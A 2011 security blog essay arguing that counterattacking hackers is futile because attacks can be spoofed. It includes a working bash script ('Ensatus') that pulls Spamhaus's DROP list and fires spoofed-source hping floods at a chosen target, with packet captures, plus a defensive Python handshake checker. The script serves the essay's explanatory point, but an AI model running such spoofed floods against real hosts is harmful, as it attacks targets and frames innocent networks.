The Art of Cyber Warfare: Counterattack Fail
by J. Oquendo, infosecisland.com, April 19th 2011
Across the United States, we enjoy the protections of not only the Constitution but also our State constitutions, which almost follow the U.S. Constitution to the letter.
Using a snippet from the State of California [1] we have: "All people are by nature free and independent and have inalienable rights. Among these are enjoying and defending life and liberty, acquiring, possessing, and protecting property, and pursuing and obtaining safety, happiness, and privacy."
Pennsylvania [2], Maine [3], New Hampshire [4], Idaho [5] and other states have similar, if not the same, wording.
Following the words to the letter, how can we apply the same rights to today's rapidly changing world of information security? With so many laws coming and going, I decided to take a walk on the wild side and legally claim that I can counter-hack an attacker.
Understanding how will require a bit of skepticism and a desire to become case law; nevertheless, I will point out my reasoning for being able to counterattack a hacker trying to compromise my network. Along with that, I will also point out why counterattacking will never work.
Initially I was not going to get into this topic; however, I have received more and more e-mails this quarter concerning counterattacking. Personally, I see it as a pointless task littered with free tickets to club fed; however, hopefully someone in the legal realm could chime in with a counter article or commentary.
In trying to write this, I spent quite a few hours trying to track down a security incident that happened in the early '90s. The security incident involved someone in the military who had broken into another machine in the military. He was arrested and charged, but found not guilty of hacking.
You see, back then, banners were non-existent. He never had a warning telling him "thou shall not hack into thy superior's machines," therefore he skated away on a technicality. This led to the warning banners many systems and network administrators implement across machines [6], and while many may not know the origin of this "pseudo-law," many practice creating "Warning Banners."
With the brief security history out of the way, there is no need to introduce the history of SLAs or TOS agreements; we just know that in order for our interconnections to work, almost all businesses will have an SLA and TOS that dictate what both parties can and can't do and what they can or can't expect out of the partnership slash agreement.
Imagine the following banner for a moment:
```text
$ more /etc/motd
```
It is a simple and straightforward warning. In order for you to connect to me, you must allow my systems to check the weaknesses in your systems. As a partnership, this is actually beneficial, as I could notify you of vulnerabilities before an attacker reaches them.
On the other hand, I am placing myself in harm's way via potential loss of clients, lawsuits from someone who did not read the TOS or SLA (not to mention the banner), higher rates from a carrier for potential excessive use of bandwidth, and, not to forget, interconnected peers and networks will not be happy about what appears to be an attack leaving my network, which could lead to being blacklisted.
Nevertheless, legally, I am covering myself with wording. Not only covering myself with my wording, but to a degree "enjoying and defending life and liberty, acquiring, possessing, and protecting property, and pursuing and obtaining safety, happiness, and privacy." As a provider of a service, I have the right to protect my privacy, since it is my system, and the privacy of the data that resides on my systems.
It is ironic how broadly some laws can be defined and interpreted. Because those laws are older than most computers, they are not necessarily applicable, simply because they have not been tested. Does this mean we should turn the Internet into the Wild Wild West? Not really, unless you want to pursue a stint in federal prison while you either make or test case law.
Let us now imagine that this were indeed the case: one could counterattack based on an absurd TOS, SLA or other type of legal verbiage. "Counterattacking is now legal!!!" Game over. Not for you, not for me, not for the attacker, but for almost everyone who is interconnected, as it will be the equivalent of a constant "cyber drive-by" shooting, with absolutely no winners, only losers.
Because counterattacking is legal (remember, we're imagining it is), I reserve the right to perform a penetration test against anyone connecting to me. But who exactly is connecting to me? I will never be able to see who is behind an IP, and therein lies the problem. I pointed this out in the "Decomposition Fail" chapter [7] of my "Art of Cyberwarfare" series. An IP address is not an identifier, especially when it comes to "cyberwarfare."
To drive the point home, here is a concoction I whipped up called Ensatus. The purpose of Ensatus is to attack a target of my choice while picking out an already established bad guy and pretending to be that bad guy.
The sole purpose of Ensatus is deception, and it drives home the point of "fail" when it comes to counterattacking. If I were performing a sanctioned penetration test, there is a high likelihood that I would be using decoys. In the event counterattacking were legal, you would be counterattacking an innocent victim at that point.
```sh
#!/bin/bash
# Ensatus v.0 (there will be no other versions...)
# J. Oquendo
# Proof of concept diversion/covertness generation script.
# Concept is simple, go out get a random "dirty host" via
# Spamhaus in this instance then use that host as a source
# of an attack. To be used while one is say performing a
# penetration test. The goal is simple to generate dirty
# traffic in an effort to "blend in with the crowd."
# Because I like ugly
# random scan port (1-32) and random packet count (500-999); sed strips a stray minus sign
ranport=$(( 1+( $(od -An -N2 -i /dev/random) )%(32-1+1) ))
sndport=`echo $ranport | sed 's:-::g' | sed -n '1p'`
pktsnum=$(( 500+( $(od -An -N2 -i /dev/random) )%(500-1+1) ))
# random line of the DROP list to borrow, reused as the spoofed last octet
rantarg=$((RANDOM%254+1))
suckers=/tmp/suckers
# fetch the Spamhaus DROP list once; keep the network part minus its trailing 0
if [ ! -f $suckers ]; then
  wget -qO - http://www.spamhaus.org/drop/drop.lasso | awk -F "/" '{print $1}' |\
  sed 's:0$::g' > $suckers
fi
# pick line $rantarg of the list as the "dirty" network
randnet=`sed -n "${rantarg}p" $suckers`
echo "Enter target"
read targeted
echo sending hping -8 $sndport -c $pktsnum -a $randnet.$rantarg $targeted | sed 's:\.\.:\.:g'
echo "How many instances should we send out? (enter a number)"
read number
i="0"
while [ $i -lt $number ]; do
  echo hping -8 $sndport -c $pktsnum -i 100 -a $randnet.$rantarg $targeted | sed 's:\.\.:\.:g' | sh &
  i=$[$i+1]
done
```
Does it work? From the attacker machine (sanitized for a clean look):
```text
root@axios:~/ENS# uname -a
Linux axios 2.6.29.4 #1 SMP Thu Jun 18 10:57:32 EDT 2009 i686 GNU/Linux
root@axios:~/ENS# ./ensatus.sh
Enter target
10.4.4.128
sending hping -8 24 -c -a 193.201.192.127 10.4.4.128
How many instances should we send out? (enter a number)
Scanning 10.4.4.128 (10.4.4.128), port 24
1 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+
|port| serv name | flags |ttl| id | win |
+----+-----------+---------+---+-----+-----+
root@axios:~/ENS#
```
On the victim end, this is the output via Wireshark [8]:
```text
root@chousen:/home/sil# uname -a
Linux chousen 2.6.35-27 SMP Tue Feb 22 20:25:29 UTC 2011 i686 GNU/Linux
root@chousen:/home/sil# tshark -i eth0 -R "ip.addr == 193.201.192.127" > OUT.txt
Running as user "root" and group "root". This could be dangerous.
Capturing on eth0
^C20 packets captured
root@chousen:/home/sil# more OUT.txt
1.348529 193.201.192.127 -> 10.4.4.128 TCP rap-listen > 24 [] Seq=1 Win=512 Len=0
1.348576 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.356178 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#1] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.356196 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.386481 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#2] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.386502 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.464751 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#3] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.464780 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.554046 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#4] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.554074 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.596722 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#5] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.596748 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.607143 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#6] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.607164 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.648786 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#7] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.648805 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.724455 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#8] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.724499 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.740352 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#9] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.740375 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
```
Now, imagine if the victim machine were to counterattack: both sides lose. Not only would both sides lose, but everyone in between would lose, as the victim would need to use bandwidth to counter, not to forget that the other side is also a victim. If that side also had a counterattacking mechanism in place, you'd have the equivalent of a reflection between two mirrors, never ending.
We must remember that many attackers are never going to come from their true address. So what would be the point of even attempting to counterattack, or of creating an application or system that does so?
On the contrary, this will lead to more problems than one could ever wish for. Also, because of the flaws in the common structure of IP, it is likely that attackers would endorse these absurd products. While these systems were busy countering ghosts, an attacker would have a greater capability to blend into the crowd.
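As an added example (not part of the original article), here is a small Python check a defender could run over capture lines in the tshark summary format shown above: for each remote address it records whether a SYN / SYN-ACK / ACK handshake with the local host ever completed. The two spoofed 193.201.192.127 exchanges are the page's own capture lines, the 198.51.100.7 session is constructed for contrast, and the local address 10.4.4.128 is taken from the capture.

```python
import re
from collections import defaultdict

# Sample input: two spoofed exchanges from the capture above (answered only with RST)
# plus a constructed, completed handshake from 198.51.100.7 for contrast.
CAPTURE = """\
1.348529 193.201.192.127 -> 10.4.4.128 TCP rap-listen > 24 [] Seq=1 Win=512 Len=0
1.348576 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
1.356178 193.201.192.127 -> 10.4.4.128 TCP [TCP Dup ACK 18#1] rap-listen > 24 [] Seq=1 Win=512 Len=0
1.356196 10.4.4.128 -> 193.201.192.127 TCP 24 > rap-listen [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
2.000000 198.51.100.7 -> 10.4.4.128 TCP 40001 > 22 [SYN] Seq=0 Win=29200 Len=0
2.000100 10.4.4.128 -> 198.51.100.7 TCP 22 > 40001 [SYN, ACK] Seq=0 Ack=1 Win=28960 Len=0
2.000300 198.51.100.7 -> 10.4.4.128 TCP 40001 > 22 [ACK] Seq=1 Ack=1 Win=29200 Len=0
"""

# tshark summary line: time, src -> dst, TCP, optional "[analysis note]", ports, [flags]
LINE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>\S+) TCP (?:\[[^\]]*\] )?"
                  r"(?P<sport>\S+) > (?P<dport>\S+) \[(?P<flags>[^\]]*)\]")

def parse(text):
    """Yield (src, dst, flag set) for every line in the tshark summary format."""
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            yield m["src"], m["dst"], {f.strip() for f in m["flags"].split(",") if f.strip()}

def classify_sources(text, local_ip):
    """Per remote address, did a SYN / SYN-ACK / ACK handshake with local_ip complete?
    No completed handshake means the claimed source was never shown to be reachable."""
    state = defaultdict(lambda: {"packets": 0, "syn": False, "synack": False,
                                 "ack": False, "rst_from_us": 0})
    for src, dst, flags in parse(text):
        if src == local_ip:                       # our reply to the claimed remote
            s = state[dst]
            s["rst_from_us"] += "RST" in flags
            s["synack"] |= {"SYN", "ACK"} <= flags
        elif dst == local_ip:                     # packet claiming to come from the remote
            s = state[src]
            s["packets"] += 1
            if "SYN" in flags and "ACK" not in flags:
                s["syn"] = True
            elif "ACK" in flags and "RST" not in flags and s["synack"]:
                s["ack"] = True                   # third step: remote really saw our SYN-ACK
    return {ip: dict(s, handshake=s["syn"] and s["synack"] and s["ack"])
            for ip, s in state.items()}

for ip, v in classify_sources(CAPTURE, "10.4.4.128").items():
    print(ip, "handshake completed" if v["handshake"] else "unverified, may be spoofed", v["packets"])
```

The spoofed source never acknowledges anything, so it stays unverified; an automated response keyed on that address would hit whoever really owns 193.201.192.127.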
After all that has been written, I do believe that it would be possible to counterattack legally; however, it would be as absurd as believing that it would make an iota of difference in stopping an attacker, preventing future attacks, deterring potential attackers, or even gathering any actionable information about a real attacker.
[1] http://www.leginfo.ca.gov/.const/.article_1
[2] http://www.the-patriot-s-voice.org/id18.html
[3] http://www.maine.gov/legis/const/Constitution2005-01.htm
[4] http://www.lonang.com/exlibris/organic/1784-nhr.htm
[5] http://www.sos.idaho.gov/elect/stcon/articl01.htm
[6] http://www.unixworks.net/papers/wp-007.pdf
[7] http://infiltrated.net/index.php?option=com_content&view=article&id=24&Itemid=30
[8] http://www.wireshark.org/
Cross-posted from Infiltrated
Original Page: https://www.infosecisland.com/blogview/13051-The-Art-of-Cyber-Warfare-Counterattack-Fail.html